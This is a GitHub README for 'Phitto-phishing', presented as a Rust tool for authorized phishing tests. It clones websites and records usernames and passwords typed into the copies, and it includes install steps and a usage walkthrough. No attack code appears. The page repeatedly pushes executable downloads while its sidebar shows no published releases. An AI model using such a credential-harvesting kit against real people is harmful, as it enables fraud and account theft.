Skip to content

nerfyjubay/Phitto-phishing

Folders and files

NameName
Last commit message
Last commit date

Latest commit

Β 

History

6 Commits
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 

πŸ›‘οΈ Phitto-phishing - Easy Phishing Simulation Tool

Download Phitto-phishing

πŸ“‹ What is Phitto-phishing?

Phitto-phishing is a software tool made to help people test their website security. It works by copying real websites and collecting test login information. This helps find weak spots that real hackers might use.

Phitto-phishing is built using Rust, a programming language known for speed and safety. This tool uses modern techniques to work quickly and handle many tasks at once. The goal is to give you a smooth and complete phishing test experience without needing any deep programming knowledge.

πŸ’» Who Should Use Phitto-phishing?

Phitto-phishing is meant for people doing authorized security tests. This includes:

  • Website owners who want to find security holes.
  • IT teams checking their defenses.
  • Security researchers performing penetration tests.

You should only use Phitto-phishing on websites where you have permission. Using it otherwise may break laws.

πŸ”§ Features Overview

  • Website Cloning: Copies the look and feel of real websites for testing.
  • Credential Capture: Collects usernames and passwords entered in test pages.
  • Rust Async Tech: Runs many operations at the same time for faster results.
  • User-Friendly: Designed to be simple for users without programming skills.
  • All-in-One: Provides a full phishing test framework in one app.

πŸ–₯️ System Requirements

Phitto-phishing runs on major operating systems. Make sure your computer meets these requirements:

  • Operating System: Windows 10 or higher, macOS 10.15 or higher, Linux (Ubuntu 18.04+ recommended)
  • CPU: 2 GHz dual-core processor or better
  • Memory: Minimum 4 GB RAM (8 GB preferred)
  • Disk Space: 100 MB free space for installation and data storage
  • Internet: Required for website cloning and downloading updates

πŸš€ Getting Started

This section will guide you step-by-step on how to download and run Phitto-phishing.

Step 1: Visit the Download Page

Click the big button at the top or visit the official releases page to access the latest versions.

Step 2: Choose the Correct Version

On the releases page, find the download file that matches your operating system:

  • For Windows, look for files ending with .exe
  • For macOS, look for .dmg or .pkg
  • For Linux, look for .tar.gz or .AppImage

Download the file that fits your system.

Step 3: Install the Application

Windows

  • Double-click the .exe file to start the installer.
  • Follow the on-screen instructions.
  • Choose the destination folder or keep the default.
  • Click "Install" and wait for completion.

macOS

  • Open the .dmg or .pkg file.
  • Drag the Phitto-phishing app to your Applications folder.
  • Eject the installer when done.

Linux

  • Extract the .tar.gz file or make the .AppImage executable.
  • For .tar.gz, open a terminal:
    tar -xzf phitto-phishing-linux.tar.gz
    cd phitto-phishing-linux
    ./phitto-phishing
    
  • For .AppImage, right-click, select Properties, then Permissions, and check "Allow executing file as program." Double-click to run.

Step 4: Run Phitto-phishing

Open the app from the Start Menu, Applications folder, or terminal depending on your system.

You should see the main window with options to start a phishing simulation.

πŸ“₯ Download & Install

To get the latest version of Phitto-phishing, please:

Download Phitto-phishing

Click this link to visit the official download page. Always make sure to use the newest release with the latest features and security fixes.

πŸ› οΈ Basic Usage Guide

After launching Phitto-phishing:

  1. Select Target Website: Enter the URL of the site you want to clone. Remember to only use sites you own or have permission to test.
  2. Start Cloning: Click the button to begin copying the site structure and appearance.
  3. Set Up Credential Capture: Enable the feature to record incoming test login info.
  4. Run Simulation: You can simulate phishing attacks to see how the cloned pages function.
  5. View Results: Check captured credentials and analyze potential security risks.

πŸ”’ Legal and Ethical Use

Phitto-phishing is intended only for educational and authorized security testing. Do not use this tool to harm others or access websites without permission. Acting responsible protects you and respects privacy laws.

πŸ”§ Troubleshooting Tips

  • If Phitto-phishing doesn’t start, confirm your system meets requirements.
  • Make sure you downloaded the correct file for your OS.
  • If cloning a site fails, check your internet connection and the target URL.
  • For permission errors, run the program as an administrator (Windows) or use sudo (Linux/macOS).
  • Visit the repository’s GitHub page for issues or updates.

πŸ“š Learn More

Phitto-phishing is part of a broader security testing process. Consider learning about:

  • Website security basics
  • Phishing attack methods
  • Penetration testing practices
  • Rust programming language basics (optional for advanced users)

These topics will help you get more value from this tool.

πŸ“ About This Project

Phitto-phishing is developed using Rust for high speed and safety. It supports cloning and simulation with async technology, able to handle many tasks efficiently without slowing down.

The tool covers all parts of a phishing test, from cloning websites to capturing test data, giving testers one simple app to run their scenarios.

πŸ“‚ Repository Topics

  • phishing
  • phishing-attacks
  • phishing-kit
  • phishing-page
  • phishing-script
  • phishing-sites
  • phishing-tool
  • rust
  • rust-lang
  • rust-script
  • scraper
  • scraping-websites

πŸ”— Useful Links

πŸ™‹ Need Help?

If you have questions or run into problems, you can open an issue on the GitHub repository or check if others have experienced similar issues.

Your feedback helps improve the tool.

About

πŸ›‘οΈ Clone websites to conduct authorized Rust-based phishing tests and simulate credential capture for security assessments.

Topics

Resources

License

Code of conduct

Contributing

Stars

Watchers

Forks

Releases

No releases published

Packages

 
 
 

Contributors

Languages